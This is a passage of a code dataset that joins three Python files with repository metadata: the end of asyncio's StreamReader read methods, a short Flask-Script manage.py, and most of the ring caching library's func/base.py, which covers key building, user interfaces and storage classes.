            # no separator was seen, drop the whole buffer.
            if self._buffer.startswith(sep, e.consumed):
                del self._buffer[:e.consumed + seplen]
            else:
                self._buffer.clear()
            self._maybe_resume_transport()
            raise ValueError(e.args[0])
        return line

    async def readuntil(self, separator=b'\n'):
        """Read data from the stream until ``separator`` is found.

        On success, the data and separator will be removed from the
        internal buffer (consumed). Returned data will include the
        separator at the end.

        Configured stream limit is used to check result. Limit sets the
        maximal length of data that can be returned, not counting the
        separator.

        If an EOF occurs and the complete separator is still not found,
        an IncompleteReadError exception will be raised, and the internal
        buffer will be reset.  The IncompleteReadError.partial attribute
        may contain the separator partially.

        If the data cannot be read because of over limit, a
        LimitOverrunError exception  will be raised, and the data
        will be left in the internal buffer, so it can be read again.
        """
        seplen = len(separator)
        if seplen == 0:
            raise ValueError('Separator should be at least one-byte string')
        if self._exception is not None:
            raise self._exception
        # Consume whole buffer except last bytes, which length is
        # one less than seplen. Let's check corner cases with
        # separator='SEPARATOR':
        # * we have received almost complete separator (without last
        #   byte). i.e buffer='some textSEPARATO'. In this case we
        #   can safely consume len(separator) - 1 bytes.
        # * last byte of buffer is first byte of separator, i.e.
        #   buffer='abcdefghijklmnopqrS'. We may safely consume
        #   everything except that last byte, but this require to
        #   analyze bytes of buffer that match partial separator.
        #   This is slow and/or require FSM. For this case our
        #   implementation is not optimal, since require rescanning
        #   of data that is known to not belong to separator. In
        #   real world, separator will not be so long to notice
        #   performance problems. Even when reading MIME-encoded
        #   messages :)
        # `offset` is the number of bytes from the beginning of the buffer
        # where there is no occurrence of `separator`.
        offset = 0
        # Loop until we find `separator` in the buffer, exceed the buffer size,
        # or an EOF has happened.
        while True:
            buflen = len(self._buffer)
            # Check if we now have enough data in the buffer for `separator` to
            # fit.
            if buflen - offset >= seplen:
                isep = self._buffer.find(separator, offset)
                if isep != -1:
                    # `separator` is in the buffer. `isep` will be used later
                    # to retrieve the data.
                    break
                # see upper comment for explanation.
                offset = buflen + 1 - seplen
                if offset > self._limit:
                    raise exceptions.LimitOverrunError(
                        'Separator is not found, and chunk exceed the limit',
                        offset)
            # Complete message (with full separator) may be present in buffer
            # even when EOF flag is set. This may happen when the last chunk
            # adds data which makes separator be found. That's why we check for
            # EOF *after* inspecting the buffer.
            if self._eof:
                chunk = bytes(self._buffer)
                self._buffer.clear()
                raise exceptions.IncompleteReadError(chunk, None)
            # _wait_for_data() will resume reading if stream was paused.
            await self._wait_for_data('readuntil')
        if isep > self._limit:
            raise exceptions.LimitOverrunError(
                'Separator is found, but chunk is longer than limit', isep)
        chunk = self._buffer[:isep + seplen]
        del self._buffer[:isep + seplen]
        self._maybe_resume_transport()
        return bytes(chunk)

    async def read(self, n=-1):
        """Read up to `n` bytes from the stream.

        If n is not provided, or set to -1, read until EOF and return all read
        bytes. If the EOF was received and the internal buffer is empty, return
        an empty bytes object.

        If n is zero, return empty bytes object immediately.

        If n is positive, this function try to read `n` bytes, and may return
        less or equal bytes than requested, but at least one byte. If EOF was
        received before any byte is read, this function returns empty byte
        object.

        Returned value is not limited with limit, configured at stream
        creation.

        If stream was paused, this function will automatically resume it if
        needed.
        """
        if self._exception is not None:
            raise self._exception
        if n == 0:
            return b''
        if n < 0:
            # This used to just loop creating a new waiter hoping to
            # collect everything in self._buffer, but that would
            # deadlock if the subprocess sends more than self.limit
            # bytes.  So just call self.read(self._limit) until EOF.
            blocks = []
            while True:
                block = await self.read(self._limit)
                if not block:
                    break
                blocks.append(block)
            return b''.join(blocks)
        if not self._buffer and not self._eof:
            await self._wait_for_data('read')
        # This will work right even if buffer is less than n bytes
        data = bytes(self._buffer[:n])
        del self._buffer[:n]
        self._maybe_resume_transport()
        return data

    async def readexactly(self, n):
        """Read exactly `n` bytes.

        Raise an IncompleteReadError if EOF is reached before `n` bytes can be
        read. The IncompleteReadError.partial attribute of the exception will
        contain the partial read bytes.

        if n is zero, return empty bytes object.

        Returned value is not limited with limit, configured at stream
        creation.

        If stream was paused, this function will automatically resume it if
        needed.
        """
        if n < 0:
            raise ValueError('readexactly size can not be less than zero')
        if self._exception is not None:
            raise self._exception
        if n == 0:
            return b''
        while len(self._buffer) < n:
            if self._eof:
                incomplete = bytes(self._buffer)
                self._buffer.clear()
                raise exceptions.IncompleteReadError(incomplete, n)
            await self._wait_for_data('readexactly')
        if len(self._buffer) == n:
            data = bytes(self._buffer)
            self._buffer.clear()
        else:
            data = bytes(self._buffer[:n])
            del self._buffer[:n]
        self._maybe_resume_transport()
        return data

    def __aiter__(self):
        return self

    async def __anext__(self):
        # Async iteration yields lines until EOF.
        val = await self.readline()
        if val == b'':
            raise StopAsyncIteration
        return val
| 36.023715 | 79 | 0.608478 |
79553137b47037f4032bdf73042a0df2a8bed8d0 | 231 | py | Python | manage.py | bintadam/DailyNewsApp | 3bed025cd53aa3dab83de4cf7425203506f48951 | [
"MIT"
] | null | null | null | manage.py | bintadam/DailyNewsApp | 3bed025cd53aa3dab83de4cf7425203506f48951 | [
"MIT"
] | null | null | null | manage.py | bintadam/DailyNewsApp | 3bed025cd53aa3dab83de4cf7425203506f48951 | [
"MIT"
] | null | null | null | from app import create_app
from flask_script import Manager, Server
# Creating app instance
app = create_app('development')
manager = Manager(app)
manager.add_command('server',Server)
if __name__ == '__main__':
manager.run() | 21 | 40 | 0.761905 |
7955318357c5715d20c7c5e780a16b8a272ad7d6 | 32,628 | py | Python | ring/func/base.py | machenity/ring | a44aa375e45e09f33e2a48067cfeafdde07a8bad | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | ring/func/base.py | machenity/ring | a44aa375e45e09f33e2a48067cfeafdde07a8bad | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | ring/func/base.py | machenity/ring | a44aa375e45e09f33e2a48067cfeafdde07a8bad | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | """:mod:`ring.func.base` --- The building blocks of **ring.func.\***.
=====================================================================
""" # noqa: W605
import abc
import types
from typing import List
import six
from wirerope import Wire, WireRope, RopeCore
from .._compat import functools, qualname
from ..callable import Callable
from ..key import CallableKey
from ..coder import registry as default_registry
try:
import numpy as np
except ImportError:
np = None
try:
import dataclasses
except ImportError: # pragma: no cover
dataclasses = None
__all__ = (
'factory', 'NotFound',
'BaseUserInterface', 'BaseStorage', 'CommonMixinStorage', 'StorageMixin')
def suggest_ignorable_keys(c, ignorable_keys):
    """Return the given ignorable keys, defaulting to an empty list.

    :param c: The wrapped callable (unused; kept for a uniform
        suggest_* signature).
    :param ignorable_keys: A user-provided list of parameter names to
        exclude from the key, or None.
    """
    return [] if ignorable_keys is None else ignorable_keys
def suggest_key_prefix(c, key_prefix):
    """Return a key prefix, deriving a default from *c* when not given.

    A user-supplied prefix has its braces escaped so that later
    ``str.format`` calls leave them intact; a derived prefix keeps its
    placeholders.
    """
    if key_prefix is not None:
        return key_prefix.replace('{', '{{').replace('}', '}}')
    key_prefix = c.identifier
    if six.PY2:
        cc = c.wrapped_callable
        # A proper solution is `im_class` of the bound method
        if c.is_membermethod:
            key_prefix = (
                '{0.__module__}.{{self.__class__.__name__}}.{0.__name__}'
                .format(cc))
        elif c.is_classmethod:
            key_prefix = '{0.__module__}.{{cls}}.{0.__name__}'.format(cc)
    return key_prefix
def _coerce_bypass(v):
return v
def _coerce_list_and_tuple(v):
return str(v).replace(' ', '')
def _coerce_type(v):
return v.__name__
def _coerce_dict(v):
return ','.join(['{},{}'.format(k, v[k]) for k in sorted(v.keys())])
def _coerce_set(v):
return ','.join(sorted(v))
def _coerce_ring_key(v):
return v.__ring_key__()
def _coerce_dataclass(v):
    """Key a dataclass instance by its class name plus its fields."""
    body = _coerce_dict(dataclasses.asdict(v))
    return type(v).__name__ + body
@functools.lru_cache(maxsize=128)
def coerce_function(t):
    """Return the coercion function for type *t*, or None when unknown.

    The result is cached per type.  The check order matters: an
    explicit __ring_key__ hook always wins, then built-in scalar and
    container types, then optional numpy/dataclass support.
    """
    if hasattr(t, '__ring_key__'):
        return _coerce_ring_key
    if issubclass(t, (int, str, bool, type(None), type(Ellipsis))):
        return _coerce_bypass
    if issubclass(t, (list, tuple)):
        return _coerce_list_and_tuple
    if t == type:
        return _coerce_type
    if issubclass(t, dict):
        return _coerce_dict
    if issubclass(t, (set, frozenset)):
        return _coerce_set
    if np is not None:
        if issubclass(t, np.ndarray):
            return _coerce_list_and_tuple
    if dataclasses is not None:
        if dataclasses.is_dataclass(t):
            return _coerce_dataclass
    # Implicitly return None: the caller falls back to other protocols.
# NOTE: general sequence processing is fine -
# but NEVER add general iterator processing; it will cause user bugs.
def coerce(v, in_memory_storage):
    """Transform the given value to cache-friendly string data."""
    converter = coerce_function(type(v))
    if converter is not None:
        return converter(v)
    if hasattr(v, '__ring_key__'):
        return v.__ring_key__()
    # In-memory storages may fall back to a custom __hash__.
    if in_memory_storage and type(v).__hash__ != object.__hash__:
        return "{}:hash:{}".format(qualname(type(v)), hash(v))
    cls = v.__class__
    # A custom __str__ is accepted as a key representation.
    if cls.__str__ != object.__str__:
        return str(v)
    if in_memory_storage:
        msg = "Add __ring_key__(), __str__() or __hash__()."
    else:
        msg = "Add __ring_key__() or __str__()."
    raise TypeError(
        "The given value '{}' of type '{}' is not a key-compatible type. {}".format(v, cls, msg))
def create_key_builder(
        c, key_prefix, ignorable_keys, coerce=coerce, encoding=None,
        key_refactor=None, in_memory_storage=False):
    """Build and return a key-composing closure for the callable *c*.

    The returned ``compose_key(*bound_args, **kwargs)`` merges bound
    positional arguments into the keyword mapping, coerces each
    non-ignorable value, renders the key, and applies the optional
    encoding and refactor steps.
    """
    assert isinstance(c, Callable)
    key_generator = CallableKey(
        c, format_prefix=key_prefix, ignorable_keys=ignorable_keys)

    def compose_key(*bound_args, **kwargs):
        full_kwargs = dict(kwargs)
        # Map each bound positional argument onto its parameter name.
        for index, bound_arg in enumerate(bound_args):
            full_kwargs[c.parameters[index].name] = bound_arg
        coerced_kwargs = {}
        for name, value in full_kwargs.items():
            if name not in ignorable_keys:
                coerced_kwargs[name] = coerce(value, in_memory_storage)
        key = key_generator.build(coerced_kwargs)
        if encoding:
            key = key.encode(encoding)
        if key_refactor:
            key = key_refactor(key)
        return key

    return compose_key
def interface_attrs(**kwargs):
    """Decorator factory attaching interface metadata to a method.

    :param return_annotation: Stored as
        ``__annotations_override__['return']``; may be a type or a
        callable resolved later by the wire machinery.
    :param transform_args: A function, or a ``(function, rules)`` pair,
        describing how actual call arguments are transformed before the
        interface method runs.  A bare function is normalized to
        ``(function, {})``.  The only supported rule is
        ``'prefix_count'``.
    :return: A decorator that merges the collected attributes into the
        target function's ``__dict__``.
    """
    if 'return_annotation' in kwargs:
        kwargs['__annotations_override__'] = {
            'return': kwargs.pop('return_annotation')}
    if 'transform_args' in kwargs:
        transform_args = kwargs.pop('transform_args')
        if transform_args:
            # Normalize a bare function into the canonical (func, rules)
            # pair.  `is not tuple` intentionally excludes tuple
            # subclasses, matching the original strict type check.
            if type(transform_args) is not tuple:
                transform_args = transform_args, {}
            func, rules = transform_args
            assert frozenset(rules.keys()) <= frozenset({'prefix_count'})
            kwargs['transform_args'] = transform_args
    # Guard against typos: only these attributes are recognized.
    assert frozenset(kwargs.keys()) <= frozenset(
        {'transform_args', '__annotations_override__'})

    def _decorator(f):
        f.__dict__.update(kwargs)
        return f

    return _decorator
def transform_kwargs_only(wire, rules, args, kwargs):
    """`transform_args` for basic single-access methods in interfaces.

    Compose uniform, fully keyword-annotated arguments from the actual
    call, skipping the first ``rules.get('prefix_count')`` positional
    arguments, which are passed through untouched.  Interface authors
    can then work with a plain keyword mapping instead of raw args.

    :param ring.func.base.RingWire wire: The wire whose callable
        signature drives the merge.
    :param int rules.prefix_count: The number of leading positional
        parameters to treat as *method parameters* and keep out of the
        keyword mapping.  The default value is ``0``.
    :return: A pair ``(wrapper_args, full_kwargs)`` of the skipped
        prefix arguments and the fully keyword-annotated arguments.
    :rtype: tuple

    :see: the source code of :class:`ring.func.base.BaseUserInterface`
        about actual usage.
    """
    skip = rules.get('prefix_count', 0)
    wrapper_args = args[:skip]
    full_kwargs = wire._merge_args(args[skip:], kwargs)
    return wrapper_args, full_kwargs
@six.add_metaclass(abc.ABCMeta)
class BaseUserInterface(object):
    """The base user interface class for single item access.

    An instance of interface class is bound to a **Ring** object. They have
    the one-to-one relationship. Subclass this class to create a new user
    interface. This is an abstract class. The methods marked as
    :func:`abc.abstractmethod` are mandatory; Otherwise not.

    This class provides sub-functions of ring wires. When trying to access
    any sub-function of a ring wire which doesn't exist, it looks up
    the composed user interface object and creates actual sub-function
    into the ring wire.

    The parameter *transform_args* in :func:`ring.func.base.interface_attrs`
    defines the figure of method parameters. For the **BaseUserInterface**,
    every method's *transform_args* is
    :func:`ring.func.base.transform_kwargs_only` which force to pass uniform
    keyword arguments to the interface methods.
    Other mix-ins or subclasses may have different *transform_args*.

    The first parameter of interface method *always* is a **RingWire** object.
    The other parameters are composed by *transform_args*.

    :see: :func:`ring.func.base.transform_kwargs_only` for the specific
        argument transformation rule for each methods.

    The parameters below describe common methods' parameters.

    :param ring.func.base.RingWire wire: The corresponding ring
        wire object.
    :param Dict[str,Any] kwargs: Fully keyword-annotated arguments. When
        actual function arguments are passed to each sub-function of the
        wire, they are merged into the form of keyword arguments. This gives
        the consistent interface for arguments handling. Note that it only
        describes the methods' *transform_args* attribute is
        :func:`ring.func.base.transform_kwargs_only`
    """

    def __init__(self, rope):
        # The RopeCore this interface is bound to (one-to-one).
        self.rope = rope

    @interface_attrs(
        transform_args=transform_kwargs_only, return_annotation=str)
    def key(self, wire, **kwargs):
        """Create and return the composed key for storage.

        :see: The class documentation for the parameter details.
        :return: The composed key with given arguments.
        :rtype: str
        """
        return self.rope.compose_key(*wire._bound_objects, **kwargs)

    @interface_attrs(transform_args=transform_kwargs_only)
    def execute(self, wire, **kwargs):
        """Execute and return the result of the original function.

        :see: The class documentation for the parameter details.
        :return: The result of the original function.
        """
        return wire.__func__(**kwargs)

    @abc.abstractmethod
    @interface_attrs(transform_args=transform_kwargs_only)
    def get(self, wire, **kwargs):  # pragma: no cover
        """Try to get and return the storage value of the corresponding key.

        :see: The class documentation for the parameter details.
        :see: :meth:`ring.func.base.BaseUserInterface.key` for the key.
        :return: The storage value for the corresponding key if it exists;
            Otherwise, the `miss_value` of **Ring** object.
        """
        raise NotImplementedError

    # NOTE(review): unlike get/update/get_or_update/delete, `set` is not
    # decorated with @abc.abstractmethod, although its docstring reads
    # like a mandatory method — possibly an oversight; confirm before
    # relying on abstract enforcement.
    @interface_attrs(
        transform_args=(transform_kwargs_only, {'prefix_count': 1}))
    def set(self, wire, value, **kwargs):  # pragma: no cover
        """Set the storage value of the corresponding key as the given `value`.

        :see: :meth:`ring.func.base.BaseUserInterface.key` for the key.

        :see: The class documentation for common parameter details.
        :param Any value: The value to save in the storage.
        :rtype: None
        """
        raise NotImplementedError

    @abc.abstractmethod
    @interface_attrs(transform_args=transform_kwargs_only)
    def update(self, wire, **kwargs):  # pragma: no cover
        """Execute the original function and `set` the result as the value.

        This action is comprehensible as a concatenation of
        :meth:`ring.func.base.BaseUserInterface.execute` and
        :meth:`ring.func.base.BaseUserInterface.set`.

        :see: :meth:`ring.func.base.BaseUserInterface.key` for the key.
        :see: :meth:`ring.func.base.BaseUserInterface.execute` for the
            execution.

        :see: The class documentation for the parameter details.
        :return: The result of the original function.
        """
        raise NotImplementedError

    @abc.abstractmethod
    @interface_attrs(transform_args=transform_kwargs_only)
    def get_or_update(self, wire, **kwargs):  # pragma: no cover
        """Try to get and return the storage value; Otherwise, update and so.

        :see: :meth:`ring.func.base.BaseUserInterface.get` for get.
        :see: :meth:`ring.func.base.BaseUserInterface.update` for update.

        :see: The class documentation for the parameter details.
        :return: The storage value for the corresponding key if it exists;
            Otherwise result of the original function.
        """
        raise NotImplementedError

    @abc.abstractmethod
    @interface_attrs(transform_args=transform_kwargs_only)
    def delete(self, wire, **kwargs):  # pragma: no cover
        """Delete the storage value of the corresponding key.

        :see: :meth:`ring.func.base.BaseUserInterface.key` for the key.

        :see: The class documentation for the parameter details.
        :rtype: None
        """
        raise NotImplementedError

    @interface_attrs(transform_args=transform_kwargs_only)
    def has(self, wire, **kwargs):  # pragma: no cover
        """Return whether the storage has a value of the corresponding key.

        This is an optional function.

        :see: :meth:`ring.func.base.BaseUserInterface.key` for the key.

        :see: The class documentation for the parameter details.
        :return: Whether the storage has a value of the corresponding key.
        :rtype: bool
        """
        raise NotImplementedError

    @interface_attrs(transform_args=transform_kwargs_only)
    def touch(self, wire, **kwargs):  # pragma: no cover
        """Touch the storage value of the corresponding key.

        This is an optional function.

        :note: `Touch` means resetting the expiration.
        :see: :meth:`ring.func.base.BaseUserInterface.key` for the key.

        :see: The class documentation for the parameter details.
        :rtype: bool
        """
        raise NotImplementedError
def create_bulk_key(interface, wire, args):
    """Compose a storage key from one bulk-call argument set.

    *args* must be a tuple (positional form) or a dict (keyword form);
    anything else raises TypeError.
    """
    if isinstance(args, tuple):
        return interface.key(wire, **wire._merge_args(args, {}))
    if isinstance(args, dict):
        return interface.key(wire, **args)
    raise TypeError(
        "Each parameter of '_many' suffixed sub-functions must be an "
        "instance of 'tuple' or 'dict'")
def execute_bulk_item(wire, args):
    """Run the wrapped function once with one bulk-call argument set.

    *args* must be a tuple (positional form) or a dict (keyword form);
    anything else raises TypeError.
    """
    if isinstance(args, tuple):
        return wire.__func__(*args)
    if isinstance(args, dict):
        return wire.__func__(**args)
    raise TypeError(
        "Each parameter of '_many' suffixed sub-functions must be an "
        "instance of 'tuple' or 'dict'")
class AbstractBulkUserInterfaceMixin(object):
"""Bulk access interface mixin.
Every method in this mixin is optional. The methods have each
corresponding function in :class:`ring.func.base.BaseUserInterface`.
The parameters below describe common methods' parameters.
:param ring.func.base.RingWire wire: The corresponding ring
wire object.
:param Iterable[Union[tuple,dict]] args_list: A sequence of arguments of
the original function. While **args_list** is a list of **args**,
each **args** (:class:`Union[tuple,dict]`) is a complete set of
positional-only formed or keyword-only formed arguments.
When the **args** (:class:`tuple`) is positional-only formed, its type
must be always :class:`tuple`. Any other iterable types like `list`
are not allowed. When any keyword-only argument is required, use
keyword-only formed arguments.
When the **args** (:class:`dict`) is keyword-only formed, its type must
be always :class:`dict`. When there is a variable-length positional
argument, pass the values them as a :class:`tuple` of parameters
with the corresponding variable-length positional parameter name.
The restriction gives the simple and consistent interface for
multiple dispatching. Note that it only describes the methods which
don't have *transform_args* attribute.
"""
@interface_attrs(return_annotation=lambda a: List[str])
def key_many(self, wire, *args_list):
"""Create and return the composed keys for storage.
:see: The class documentation for the parameter details.
:return: A sequence of created keys.
:rtype: Sequence[str]
"""
return [create_bulk_key(self, wire, args) for args in args_list]
def execute_many(self, wire, *args_list): # pragma: no cover
"""Execute and return the results of the original function.
:see: The class documentation for the parameter details.
:return: A sequence of the results of the original function.
:rtype: Sequence of the return type of the original function
"""
raise NotImplementedError
def get_many(self, wire, *args_list): # pragma: no cover
"""Try to get and returns the storage values.
:see: The class documentation for the parameter details.
:return: A sequence of the storage values or `miss_value` for the
corresponding keys. When a key exists in the storage, the matching
value is selected; Otherwise the `miss_value` of **Ring** object
is.
"""
raise NotImplementedError
def update_many(self, wire, *args_list): # pragma: no cover
"""Execute the original function and `set` the result as the value.
:see: The class documentation for the parameter details.
:return: A sequence of the results of the original function.
:rtype: Sequence of the return type of the original function
"""
raise NotImplementedError
def get_or_update_many(self, wire, *args_list): # pragma: no cover
"""Try to get and returns the storage values.
:note: The semantics of this function may vary by the implementation.
:see: The class documentation for the parameter details.
:return: A sequence of the storage values or the executed result of the
original function for the corresponding keys. When a key exists
in the storage, the matching value is selected; Otherwise, the
result of the original function is.
"""
raise NotImplementedError
def set_many(self, wire, args_list, value_list): # pragma: no cover
"""Set the storage values of the corresponding keys as the given values.
:see: The class documentation for common parameter details.
:param Iterable[Any] value_list: A list of the values to save in
the storage.
:rtype: None
"""
raise NotImplementedError
def delete_many(self, wire, *args_list):  # pragma: no cover
    """Remove the storage values of every corresponding key.

    :see: The class documentation for the parameter details.
    :rtype: None
    """
    raise NotImplementedError
def has_many(self, wire, *args_list):  # pragma: no cover
    """Report, per key, whether the storage holds a value.

    :see: The class documentation for the parameter details.
    :rtype: Sequence[bool]
    """
    raise NotImplementedError
def touch_many(self, wire, *args_list):  # pragma: no cover
    """Refresh the expiration of the values of every corresponding key.

    :see: The class documentation for the parameter details.
    :rtype: None
    """
    raise NotImplementedError
class RingWire(Wire):
    """Wire flavor used by **Ring**: exposes the rope's storage and codecs."""

    __slots__ = ('storage', )

    def __init__(self, rope, *args, **kwargs):
        super(RingWire, self).__init__(rope, *args, **kwargs)
        # Shortcut to the rope's storage so actions can reach it directly.
        self.storage = rope.storage

    def encode(self, v):
        """Encode *v* through the rope's coder."""
        return self._rope.encode(v)

    def decode(self, v):
        """Decode *v* through the rope's coder."""
        return self._rope.decode(v)

    def _merge_args(self, args, kwargs):
        """Create a fake kwargs object by merging actual arguments.

        The merging follows the signature of wrapped function and current
        instance.
        """
        # TODO: self._bound_objects must be empty for non-binding functions
        if type(self.__func__) is types.FunctionType:  # noqa
            bound_args = ()
        else:
            bound_args = range(len(self._bound_objects))
        return self._callable.kwargify(args, kwargs, bound_args=bound_args)

    def run(self, action, *args, **kwargs):
        """Dispatch *action* to the method of the same name on this wire."""
        return getattr(self, action)(*args, **kwargs)
class PublicRing(object):
    """User-facing hooks: lets callers override rope behaviors by decorator."""

    def __init__(self, rope):
        self._rope = rope

    def key(self, func):
        """Replace the rope's key composer with *func*."""
        self._rope.compose_key = func

    def encode(self, func):
        """Replace the rope's value encoder with *func*."""
        self._rope.encode = func

    def decode(self, func):
        """Replace the rope's value decoder with *func*."""
        self._rope.decode = func
def factory(
        storage_backend,  # actual storage
        key_prefix,  # manual key prefix
        expire_default,  # default expiration
        # keyword-only arguments from here
        # building blocks
        coder, miss_value, user_interface, storage_class,
        default_action=Ellipsis,
        coder_registry=Ellipsis,
        # callback
        on_manufactured=None,
        # optimization
        wire_slots=Ellipsis,
        # key builder related parameters
        ignorable_keys=None, key_encoding=None, key_refactor=None):
    """Create a decorator which turns a function into ring wire or wire bridge.

    This is the base factory function that every internal **Ring** factories
    are based on. See the source code of :mod:`ring.func.sync` or
    :mod:`ring.func.asyncio` for actual usages and sample code.

    :param Any storage_backend: Actual storage backend instance.
    :param Optional[str] key_prefix: Specify storage key prefix when a
        :class:`str` value is given; Otherwise a key prefix is automatically
        suggested based on the function signature. Note that the suggested
        key prefix is not compatible between Python 2 and 3.
    :param Optional[float] expire_default: Set the duration of seconds to
        expire the data when a number is given; Otherwise the default
        behavior depends on the backend. Note that the storage may or may
        not support expiration or persistent saving.
    :param Union[str,ring.coder.Coder] coder: A registered coder name or a
        coder object. See :doc:`coder` for details.
    :param Any miss_value: The default value when storage misses a given key.
    :param type user_interface: Injective implementation of sub-functions.
    :param type storage_class: Injective implementation of storage.
    :param Optional[str] default_action: The default action name for
        `__call__` of the wire object. When the given value is :data:`None`,
        there is no `__call__` method for ring wire.
    :param Optional[ring.coder.Registry] coder_registry: The coder registry
        to load the given `coder`. The default value is
        :data:`ring.coder.registry` when :data:`None` is given.
    :param Optional[Callable[[type(Wire),type(Ring)],None]] on_manufactured:
        The callback function when a new ring wire or wire bridge is created.
    :param List[str] ignorable_keys: (experimental) Parameter names not to
        use to create storage key.
    :param Optional[str] key_encoding: The storage key is usually
        :class:`str` typed. When this parameter is given, a key is encoded
        into :class:`bytes` using the given encoding.
    :param Optional[Callable[[str],str]] key_refactor: Roughly,
        ``key = key_refactor(key)`` will be run when `key_refactor` is not
        :data:`None`; Otherwise it is omitted.

    :return: The factory decorator to create new ring wire or wire bridge.
    :rtype: (Callable)->ring.wire.RopeCore
    """
    # Resolve Ellipsis-marked defaults up front so the closures below see
    # concrete values.
    if wire_slots is Ellipsis:
        wire_slots = ()
    if default_action is Ellipsis:
        default_action = 'get_or_update'
    if coder_registry is Ellipsis:
        coder_registry = default_registry
    raw_coder = coder
    ring_coder = coder_registry.get_or_coderize(raw_coder)
    # A tuple/list of interfaces is composed into a single class.
    if isinstance(user_interface, (tuple, list)):
        user_interface = type('_ComposedUserInterface', user_interface, {})

    def _decorator(f):
        _storage_class = storage_class

        # Rope: holds the coder, user interface and storage for one function.
        class RingRope(RopeCore):

            coder = ring_coder
            user_interface_class = user_interface
            storage_class = _storage_class

            def __init__(self, *args, **kwargs):
                super(RingRope, self).__init__(*args, **kwargs)
                self.user_interface = self.user_interface_class(self)
                self.storage = self.storage_class(self, storage_backend)
                _ignorable_keys = suggest_ignorable_keys(
                    self.callable, ignorable_keys)
                _key_prefix = suggest_key_prefix(self.callable, key_prefix)
                in_memory_storage = hasattr(self.storage, 'in_memory_storage')
                # Build the key composer once per rope; it is exposed so
                # PublicRing can replace it later.
                self.compose_key = create_key_builder(
                    self.callable, _key_prefix, _ignorable_keys,
                    encoding=key_encoding, key_refactor=key_refactor, in_memory_storage=in_memory_storage)
                self.compose_key.ignorable_keys = _ignorable_keys
                self.encode = self.coder.encode
                self.decode = self.coder.decode
                self.ring = PublicRing(self)

        func = f if type(f) is types.FunctionType else Callable(f).wrapped_callable  # noqa
        # Public (non-underscore) names of the user interface become wire
        # attributes / slots.
        interface_keys = tuple(k for k in dir(user_interface) if k[0] != '_')

        class _RingWire(RingWire):
            if wire_slots is not False:
                assert isinstance(wire_slots, tuple)
                __slots__ = interface_keys + wire_slots

            def _on_property(self):
                return self.run(self._rope.default_action)

            if default_action:
                @functools.wraps(func)
                def __call__(self, *args, **kwargs):
                    return self.run(self._rope.default_action, *args, **kwargs)

            def __getattr__(self, name):
                # Lazily materialize user-interface methods on first access,
                # then cache them on the instance via setattr below.
                try:
                    return super(RingWire, self).__getattr__(name)
                except AttributeError:
                    pass
                try:
                    return self.__getattribute__(name)
                except AttributeError:
                    pass

                attr = getattr(self._rope.user_interface, name)
                if callable(attr):
                    transform_args = getattr(
                        attr, 'transform_args', None)

                    def impl_f(*args, **kwargs):
                        if transform_args:
                            transform_func, transform_rules = transform_args
                            args, kwargs = transform_func(
                                self, transform_rules, args, kwargs)
                        return attr(self, *args, **kwargs)

                    cc = self._callable.wrapped_callable
                    functools.wraps(cc)(impl_f)
                    impl_f.__name__ = '.'.join((cc.__name__, name))
                    if six.PY34:
                        impl_f.__qualname__ = '.'.join((cc.__qualname__, name))
                    # Apply any per-action annotation overrides declared on
                    # the user-interface method.
                    annotations = getattr(
                        impl_f, '__annotations__', {})
                    annotations_override = getattr(
                        attr, '__annotations_override__', {})
                    for field, override in annotations_override.items():
                        if isinstance(override, types.FunctionType):
                            new_annotation = override(annotations)
                        else:
                            new_annotation = override
                        annotations[field] = new_annotation

                    setattr(self, name, impl_f)
                return self.__getattribute__(name)

        wire_rope = WireRope(_RingWire, RingRope)
        strand = wire_rope(f)
        strand.miss_value = miss_value
        strand.expire_default = expire_default
        strand.default_action = default_action
        if on_manufactured is not None:
            on_manufactured(wire_rope=strand)

        return strand

    return _decorator
class NotFound(Exception):
    """Internal exception signalling a cache miss.

    **Ring** raises this internally instead of using :data:`None` as the
    miss marker, because :mod:`ring.coder` allows :data:`None` to be a
    perfectly valid cached value.
    """
class BaseStorage(object):
    """Base storage interface.

    To add a new storage interface, regard to use
    :class:`ring.func.base.CommonMixinStorage` and a subclass of
    :class:`ring.func.base.StorageMixin`.

    When subclassing this interface, remember `get` and `set` methods must
    include coder works. The methods marked as :func:`abc.abstractmethod`
    are mandatory; Otherwise not.
    """

    def __init__(self, rope, backend):
        self.rope = rope
        self.backend = backend

    @abc.abstractmethod
    def get(self, key):  # pragma: no cover
        """Fetch the actual data stored under *key*."""
        raise NotImplementedError

    @abc.abstractmethod
    def set(self, key, value, expire=Ellipsis):  # pragma: no cover
        """Store *value* under *key*, honoring *expire*."""
        raise NotImplementedError

    @abc.abstractmethod
    def delete(self, key):  # pragma: no cover
        """Remove the data stored under *key*."""
        raise NotImplementedError

    @abc.abstractmethod
    def has(self, key):  # pragma: no cover
        """Report whether data exists under *key*."""
        raise NotImplementedError

    @abc.abstractmethod
    def touch(self, key, expire=Ellipsis):  # pragma: no cover
        """Refresh the expiration of the data stored under *key*."""
        raise NotImplementedError
class CommonMixinStorage(BaseStorage):
    """General storage root for StorageMixin.

    Wraps the raw ``*_value`` primitives of a StorageMixin with the rope's
    encode/decode and default-expiration handling.
    """

    def get(self, key):
        """Fetch the raw value for *key* and decode it."""
        return self.rope.decode(self.get_value(key))

    def set(self, key, value, expire=Ellipsis):
        """Encode *value* and store it; Ellipsis means the rope default expiry."""
        if expire is Ellipsis:
            expire = self.rope.expire_default
        return self.set_value(key, self.rope.encode(value), expire)

    def delete(self, key):
        """Remove the value stored under *key*."""
        return self.delete_value(key)

    def has(self, key):
        """Report whether a value exists under *key*."""
        return self.has_value(key)

    def touch(self, key, expire=Ellipsis):
        """Refresh expiry for *key*; Ellipsis means the rope default expiry."""
        if expire is Ellipsis:
            expire = self.rope.expire_default
        return self.touch_value(key, expire)
class StorageMixin(object):
    """Abstract storage mixin class.

    Subclass this class to create a new storage mixin. The methods marked
    as :func:`abc.abstractmethod` are mandatory; Otherwise not.
    """

    @abc.abstractmethod
    def get_value(self, key):  # pragma: no cover
        """Return the stored value for *key*."""
        raise NotImplementedError

    @abc.abstractmethod
    def set_value(self, key, value, expire):  # pragma: no cover
        """Store *value* under *key* with the given *expire*."""
        raise NotImplementedError

    @abc.abstractmethod
    def delete_value(self, key):  # pragma: no cover
        """Remove the value stored under *key*."""
        raise NotImplementedError

    def has_value(self, key):
        """Report value existence for *key*. (optional)

        Raises AttributeError so unsupporting backends look like they simply
        lack the method.
        """
        raise AttributeError

    def touch_value(self, key, expire):
